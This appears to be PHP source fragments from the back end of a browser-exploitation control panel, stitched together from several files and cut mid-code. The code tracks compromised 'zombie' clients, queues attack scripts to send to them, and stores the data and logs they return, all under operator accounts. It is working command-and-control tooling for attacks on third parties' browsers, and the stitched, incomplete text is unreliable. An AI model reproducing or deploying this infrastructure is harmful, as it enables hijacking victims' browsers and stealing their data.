header("Content-Length: 0"); ob_end_flush(); require_once "../bin/Path.php"; require_once PHP_BASE_DIR . "/db/MySQL.php"; require_once PHP_BASE_DIR . "/util/util.php"; require_once PHP_BASE_DIR . "/entity/Project.php"; require_once PHP_BASE_DIR . "/entity/ProjectModuleData.php"; require_once PHP_BASE_DIR . "/entity/AttackData.php"; $res = "{}"; if (!empty($_REQUEST["t"]) && !empty($_REQUEST["i"]) && $_REQUEST["i"] !== "null" && !empty($_REQUEST["s"])) { $ticket = $_REQUEST["t"]; $pmd_id = $_REQUEST["i"]; $stat = $_REQUEST["s"] === "online" ? 1 : 0; $db = new MySQL($log); if ($mysqli = $db->openDB()) { $pmd = new ProjectModuleData($mysqli, $log); $attackData = new AttackData($mysqli, $log); //更新客户端状态 if (!$pmd->updateStatus($pmd_id, $stat)) { $log->error("update zombie status failed!"); } //发送攻击模块 (队列形式发送) 先进先出 //更新攻击模块队列的状态 若超时,则判定攻击失败 默认15s超时 $attackData->updateAttackStatus($pmd_id, 15); $attack = $attackData->fetchModuleToAttack($pmd_id); if ($attack) { $attackData->setStatus($attack['id'], 2); //读取脚本文件 $s = new SaeStorage(); $content = $s->fileExists(SAE_STORAGE_DOMAIN, SAE_MODULES . "/" . basename($attack['m_path'])) ? $s->read(SAE_STORAGE_DOMAIN, SAE_MODULES . "/" . basename($attack['m_path'])) . "\n" : ""; //基本配置
$ec = $_REQUEST["ec"]; if (empty($pmd_id) || $pmd_id == "undefined" || $pmd_id == "null") { $pmd_id = 0; } else { $pmd_id = (int) $pmd_id; } if (empty($a_id) || $a_id == "undefined" || $a_id == "null") { $a_id = 0; } else { $a_id = (int) $a_id; } $db = new MySQL($log); $mysqli = $db->openDB(); if ($mysqli !== null) { $project = new Project($mysqli, $log); $pmd = new ProjectModuleData($mysqli, $log); $attackData = new AttackData($mysqli, $log); //如果 pmd_id 和 a_id 存在 说明是已经上线的主机 if ($pmd_id > 0 && $a_id > 0) { $pmd->updateStatus($pmd_id, 1); //更新客户端状态信息为在线 //更新攻击数据 $attackData->updateData($a_id, urldecode($data)); } else { //如果 pmd_id 和 a_id 都不存在 说明是下线的主机或者新的主机 $res = $pmd->getPmdByEC($ec, $ticket); if ($res) { //在之前已经有记录 是刚上线的主机 $pmd_id = $pmd->pmd_id; $pmd->updateStatus($pmd_id, 1); //更新客户端状态信息为在线
} } else { $content = stripslashes($content); } } else { } return $content; } $res = "{}"; if (!empty($_REQUEST["i"]) && $_REQUEST["i"] !== "null" && $_REQUEST["i"] !== "undefined" && !empty($_REQUEST["t"]) && !empty($_REQUEST["l"])) { $ticket = $_REQUEST["t"]; $logMsg = $_REQUEST["l"]; $pmd_id = $_REQUEST["i"]; $db = new MySQL($log); if ($mysqli = $db->openDB()) { $pmd = new ProjectModuleData($mysqli, $log); $attackLog = new AttackLog($mysqli, $log); //如果 pmd_id 已存在 if (!$pmd->updateStatus($pmd_id, 1)) { //更新客户端状态信息为在线 $log->error("update zombie status failed!"); } if ($attackLog->insertLog($pmd_id, quotes($logMsg))) { $res = "{}"; } $db->closeDB(); } else { $log->error("Open database connection failed!"); } } echo $res;
if (empty($data) || $data === null) { $res["reason"] = "Post Data Illegal"; die(json_encode($res)); } /** * validate power */ if (!isset($_SESSION['user_info']) || empty($_SESSION['user_info'])) { $res["reason"] = "u are not login"; die(json_encode($res)); } $db = new MySQL($log); $mysqli = $db->openDB(); if ($mysqli !== null) { $project = new Project($mysqli, $log); $pmd = new ProjectModuleData($mysqli, $log); if ($data["op"] === "del") { foreach ($data['data'] as $deldata) { $project->getProjectById($deldata["p_id"]); if ($project->u_id === $_SESSION['user_info']['id']) { //判断project的所有者是否是当前用户 if ($pmd->delPMD($deldata["pmd_id"], $deldata["p_id"])) { $res["result"] = true; $res["reason"] = "Delete data success!"; } else { $res["result"] = false; $res["reason"] = "Delete data failed!"; $db->closeDB(); die(json_encode($res)); } } else {
*/ if (!isset($_SESSION['user_info']) || empty($_SESSION['user_info'])) { $res["reason"] = "u are not login"; die(json_encode($res)); } $data = json_decode(file_get_contents('php://input'), true); $res = array("result" => false, "reason" => ""); if (empty($data) || $data === null) { $res["reason"] = "Data Illegal"; die(json_encode($res)); } $db = new MySQL($log); if ($mysqli = $db->openDB()) { $user = new User($mysqli, $log); $module = new Module($mysqli, $log); $pmd = new ProjectModuleData($mysqli, $log); $attackData = new AttackData($mysqli, $log); $attackLog = new AttackLog($mysqli, $log); //load attack module if ($data['op'] === 'load') { if ($module->getModuleByID($data['m_id'])) { $md = $module->getFields(); $md["author"] = $user->getUserByID($md['author_id']) ? $user->username : '******'; $res["result"] = true; $res["reason"] = $md; } } //send attack script if ($data['op'] === 'attack') { // do attack if (!empty($data['pmd_id']) && !empty($data['m_id'])) {
<!-- the head begind --> <?php include "./include/head.php"; ?> <!-- the head end --> <?php require_once "bin/Path.php"; require_once PHP_BASE_DIR . "/db/MySQL.php"; require_once PHP_BASE_DIR . "/entity/Module.php"; require_once PHP_BASE_DIR . "/entity/Project.php"; require_once PHP_BASE_DIR . "/entity/ProjectModuleData.php"; $pmd_id = $_GET['pmd_id']; $pmd_id = $pmd_id ? (int) htmlspecialchars($pmd_id, ENT_QUOTES, 'UTF-8') : 0; $db = new MySQL($log); if ($pmd_id > 0 && ($mysqli = $db->openDB())) { $pmdData = new ProjectModuleData($mysqli, $log); if (!$pmdData->getPmdByID($pmd_id)) { echo "<script>alert('未找到记录!');history.back();</script>"; } $u_id = $pmdData->getUidOfPmdId($pmd_id); if ((int) $user_info['id'] !== (int) $u_id) { echo "<script>alert('您无权操作!');history.back();</script>"; } } else { echo "<script>alert('数据错误!');history.back();</script>"; } ?> <!-- main begin --> <div class="container"> <!--the row jumb begin-->
<!-- the head end --> <?php require_once "bin/Path.php"; require_once PHP_BASE_DIR . "/db/MySQL.php"; require_once PHP_BASE_DIR . "/entity/Module.php"; require_once PHP_BASE_DIR . "/entity/Project.php"; require_once PHP_BASE_DIR . "/entity/ProjectModuleData.php"; $p_id = $_GET['p_id']; $p_id = $p_id ? (int) $p_id : 0; $res = false; if ($p_id > 0) { $db = new MySQL($log); $mysqli = $db->openDB(); if ($mysqli != null) { $project = new Project($mysqli, $log); $pmData = new ProjectModuleData($mysqli, $log); $module = new Module($mysqli, $log); $res = $project->getProjectById($p_id); if ($res && $user_info['id'] === $project->u_id) { // 如果项目存在且拥有者是当前用户 $pmDatas = $pmData->getPMDByProject($p_id); $module->getModuleByID($project->m_id); $pmd_num = count($pmDatas); } } } ?> <!-- main begin --> <div class="container"> <!--the row jumb begin-->